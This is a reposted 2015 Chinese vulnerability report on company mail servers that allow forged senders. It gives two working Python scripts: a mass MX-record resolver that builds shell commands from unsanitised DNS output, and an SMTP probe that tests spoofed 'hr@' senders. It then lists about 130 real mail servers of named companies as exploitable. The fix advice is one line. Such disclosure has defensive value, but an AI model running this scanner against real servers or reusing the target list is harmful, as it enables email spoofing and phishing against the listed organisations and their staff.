记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

众多厂商邮件系统配置不当可伪造邮件人

2015-04-24 04:40

邮箱服务器设置不当,没有开启验证,可以伪造发件人.影响企业内部信息安全.写了两个脚本对wooyun上的厂商跑了一遍.



下面的脚本是跑出所有厂商的邮箱服务器域名或者IP.

code 区域
#!/usr/local/bin/python

# -*- coding: utf8 -*-



import time

import dns.resolver

from multiprocessing import Process

import os



OK=[]

ERROR=[]

WHITE=["GOOGLEMAIL.COM","GOOGLE.COM","googlemail.com","qq.com","google.com","163.com","126.com"]

def white(s):

for w in WHITE:

if w in s:

return False

return True

def q(ym):

try:

if ym.startswith("www."):

ym=ym.split("www.")[1]

if ym.count(".")>1:

#get the domain

ym=ym.split(".")[-2]+"."+ym.split(".")[-1]

tmp=dns.resolver

tmp.timeout=1

answers = tmp.query(ym, 'MX')

for rdata in answers:

if white(str(rdata.exchange)):

#print "xxxx"

cmd="echo "+str(rdata.exchange)+" >> mail.txt"

#print cmd

os.system(cmd)

print rdata.exchange

OK.append(str(rdata.exchange))

except Exception,e:

print e

ERROR.append(ym)



PATH = r"yuming.txt"

fp = open(PATH, "r")

x=[]

start=time.time()

for eachline in fp:

p=Process(target=q,args=(eachline.strip(),))

p.start()

x.append(p)

#q(eachline.strip())

for i in range(len(x)):

x[i].join()

print OK

print ERROR

end=time.time()

print end-start



下面的脚本是检测得到的邮件服务器有没有开验证,能否伪造发件人

code 区域
import os, sys, string

import smtplib

import traceback

from multiprocessing import Process,Queue

FOUND=Queue()

WHITE=["auth","error","bad","deny","denied","rejected"]

def white(s):

for w in WHITE:

if w in s:

return False

return True



def go(mailserver):

try:

yuming=mailserver[len(mailserver.split(".")[0])+1:]

print yuming

from_addr="hr@"+yuming

to_addr="hr@"+yuming

msg="test"

svr=smtplib.SMTP(mailserver,timeout=10)

#svr.set_debuglevel(1)

svr.docmd("HELO localhost")

x=svr.docmd("mail from:%s"%from_addr)

if white(x[1].lower()):

y=svr.docmd("rcpt to:%s"%to_addr)

if white(y[1].lower()):

print "-------------"

print mailserver

global FOUND

FOUND.put(mailserver)

#svr.docmd("data")

#svr.send(msg+"\r\n")

#svr.send(".\r\n")

#print svr.getreply()

svr.quit()

except Exception,e:

traceback.print_exc()

x=[]

for m in open("mail.txt").readlines():

p=Process(target=go,args=[m.strip().rstrip(".")])

p.start()

x.append(p)

for i in range(len(x)):

x[i].join()

while FOUND.empty()==False:

print FOUND.get()

漏洞证明:

mail.taomee.com

mail.syyx.com

mx2.ctrip.com

mail.iboxpay.com

mailgateway.jiayuan.com

tfw.qihoo.net

mgw1.wanda.cn

mx2.mail.renren.com

mx2.mail.renren.com

mx.ctrip.com

mail.51greenorange.com

mx2.ctrip.com

mail.ku6.com

mailgate2.neusoft.com

staff.178.com

mail03.meituan.com

mail.591wed.com

mgw2.wanda.cn

mx1.huawei.com

mailsrv1.lianzhong.com

mail.998.com

mail.mplife.com

smtpin.ceair.com

mail.5173.com

mail2.qmango.com

mx1.global-mail.cn

mail.jingwei.com

mxb.mailgun.org

mail.legendsec.com

spam.jsbc.com

115.182.12.87

mail.aibang.com

antispam.m18.com

webmail.17500.cn

mx2.huawei.com

mx.ctrip.com

mailx.picchealth.com

60.190.244.147

mail.uzai.com

mx.global-mail.cn

mx01.changyou.com

mail.sootoo.com

mail.ecitic.com

mail.cnmo.com

mail3.sankuai.info

mx.global-mail.cn

mx01.unionpayintl.com

mta-189.21cn.com

meg.creditease.cn

mail.chexun.com

mail.playcool.com

mx.zhaopin.com.cn

mail02.playcool.com

mail.zuche.com

smtp.huimai365.com

mx3.huawei.com

mail.rong360.com

mailmx.picchealth.com

mx1.cofco.com

mx3.mxmail.xiaomi.com

smtpgw4.chinaamc.com

mail.locojoy.com

mail.zhujiwu.com

smtpgw1.chinaamc.com

mail01.meituan.com

cs.5173.com

mx2.weiphone.com

mail.tujia.com

mx1.bianfeng.com

mail.fun.tv

121.12.162.99

tfw.qihoo.net

smtpgw2.chinaamc.com

mail2.51greenorange.com

meizuMX1.meizu.com

mx2.vancl.cn

mail.dbw.cn

mx1.mail.renren.com

smtp.nsfocus.com

oa.legendsec.com

mail.yundaex.com

dianping-com.mail.protection.partner.outlook.cn

mail.leyou.com

mxi.opera.com

mx1.global-mail.cn

mail.oschina.net

mx1.vancl.cn

mail2.founderbn.com

mail2.bitauto.com

smtpgw3.chinaamc.com

webmail.chinahr.com

mx.55tuan.com

spam.goodbabygroup.com

mail.china-sss.com

mail.tuniu.com

meizuMX2.meizu.com

qhome.3322.org

chuangxin-com.mail.protection.partner.outlook.cn

mail.99bill.com

mx1.mail.renren.com

meg.creditease.cn

mailgate.neusoft.com

cnexcbeiedg01.chinahr.com

mail.h3c.com

mail.netentsec.com

mail1.h3c.com

mail01.playcool.com

mailmx1.sinopec.com

mail3.founderbn.com

mx1.shandagames.com

mail1.h3c.com

appchina-com.mail.protection.partner.outlook.cn

exchange.chanjet.com

exchange01.chanjet.com

mail.51web.com

mx4.huawei.com

182.148.112.202

cnexcbeiedg02.chinahr.com

mx.fun.tv

mta-189.21cn.com

mx2.99bill.com

mail.h3c.com

mx1.99bill.com



上面的也不一定都存在,但是目测存在率80%以上,手工试了十几个大厂商,都是存在的,截图如下

1.png



2.png



3.png



4.png



5.png



6.png



7.png



8.png



10.png



11.png



12.png



13.png

修复方案:

各大厂商请认证

知识来源: www.wooyun.org/bugs/wooyun-2015-098813

阅读:2621999 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“众多厂商邮件系统配置不当可伪造邮件人”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云